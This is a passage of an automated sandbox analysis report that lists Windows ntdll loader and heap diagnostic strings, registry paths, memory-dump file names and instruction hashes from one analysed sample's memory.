                                                • LdrpInitializeProcess, xrefs: 32698342
                                                • minkernel\ntdll\ldrinit.c, xrefs: 32698341
                                                • @, xrefs: 326984B1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 326D20C0
                                                • SXS: %s() passed the empty activation context, xrefs: 326D1FE8
                                                • .Local, xrefs: 326927F8
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 326D1FE3, 326D20BB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}d2
                                                • API String ID: 0-1634993941
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LUc2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-1490623326
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 326C0E72
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 326C0DEC
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 326C0E2F
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 326C0EB5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ei2
                                                • API String ID: 0-2652838342
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                • API String ID: 0-1168191160
                                                Strings
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32661648
                                                • HEAP[%wZ]: , xrefs: 32661632
                                                • HEAP: , xrefs: 326614B6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 326D00F1
                                                • RTL: Re-Waiting, xrefs: 326D0128
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 326D00C7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3273B3AA
                                                • GlobalizationUserSettings, xrefs: 3273B3B4
                                                • TargetNtPath, xrefs: 3273B3AF
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 326BE455
                                                • HEAP[%wZ]: , xrefs: 326BE435
                                                • HEAP: , xrefs: 326BE442
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 3270D792
                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3270D7B2
                                                • HEAP: , xrefs: 3270D79F
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                • API String ID: 0-3815128232
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3266A229
                                                • @Sc2, xrefs: 3266A268
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3266A21B
                                                Similarity
                                                • API ID:
                                                • String ID: @Sc2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-1512289293
                                                Strings
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 326EB2B2
                                                • @, xrefs: 326EB2F0
                                                • GlobalFlag, xrefs: 326EB30F
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                • API String ID: 0-149943524
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                Strings
                                                • RedirectedKey, xrefs: 3273B60E
                                                • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3273B5C4
                                                Similarity
                                                • API ID:
                                                • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                • API String ID: 0-1388552009
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                • API String ID: 0-118005554
                                                Similarity
                                                • API ID:
                                                • String ID: e2$ e2
                                                • API String ID: 0-779894419
                                                Similarity
                                                • API ID:
                                                • String ID: .Local\$@
                                                • API String ID: 0-380025441
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 326D289F
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 326D289A
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                • API String ID: 0-2653619699
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                Similarity
                                                • API ID:
                                                • String ID: @[u2@[u2
                                                • API String ID: 0-2348913154
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #%u
                                                • API String ID: 0-232158463
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0hu2
                                                • API String ID: 0-221536534
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: e2
                                                • API String ID: 0-1142950262
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Flst
                                                • API String ID: 0-2374792617
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 30w30w
                                                • API String ID: 3446177414-3766925445
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 65bfdba72739b9ed52d02c1eea5eace41269c4bcd0589b326058e0573e1c1642
                                                • Instruction ID: ad6f967be9ca2aaca95ffa92338e25e7fe4bc9ea50b84b064b7f4f3dfd6fb7f8
                                                • Opcode Fuzzy Hash: 65bfdba72739b9ed52d02c1eea5eace41269c4bcd0589b326058e0573e1c1642
                                                • Instruction Fuzzy Hash: 0B31047A90069DEFEB15CB58C955EAFB7B4EF80B24F014169E905A7290DB30DE04C7E1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                • Instruction ID: 42873b2842fa09f909b0eb059c150e3c3697c7e3394ac1b811a23a3e6474aae3
                                                • Opcode Fuzzy Hash: 006b348b7c6dcfea74acb74bca7e03966709d47a9d275a86641ac6ee174af2ba
                                                • Instruction Fuzzy Hash: 595103B1500345EBE321DF65CC90F5B77A8FF85764F200A2DE91297292DB70D841C7AA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a711cb4d7c5affa54b96b6699dc89546c69420fd687e33b5843931cd40c69c00
                                                • Instruction ID: 0b8e8126407c5bb03cbf93b7559690014ba22a080ffd90af077cd8e8c54803d2
                                                • Opcode Fuzzy Hash: a711cb4d7c5affa54b96b6699dc89546c69420fd687e33b5843931cd40c69c00
                                                • Instruction Fuzzy Hash: 3051EDB0A41309AFEB219FB4CC90BDDBBB8FF05304F60412AE995A7252DBB18954DF11
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee1c38c6d08ca80280cf5772cd064cd2a2d5e0de474e62c18c0500f1717242d7
                                                • Instruction ID: 3ba4afbe228ca209628260d1ac34e8c20edd5fa822a70eb83bd8645f05a27a75
                                                • Opcode Fuzzy Hash: ee1c38c6d08ca80280cf5772cd064cd2a2d5e0de474e62c18c0500f1717242d7
                                                • Instruction Fuzzy Hash: 615121B9A11656AFD305CF6CE880B69B7B0FF84310F5042A4E844DB740EB34E9A2CBD5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5910c773712350c17ec19fd756c09bd13edf1c84839428fb7645bf4435b255b0
                                                • Instruction ID: 5282dba3340a9b42776f52ed2752ba8ba7365a8d71ceb0a36e061d9c1c6b4214
                                                • Opcode Fuzzy Hash: 5910c773712350c17ec19fd756c09bd13edf1c84839428fb7645bf4435b255b0
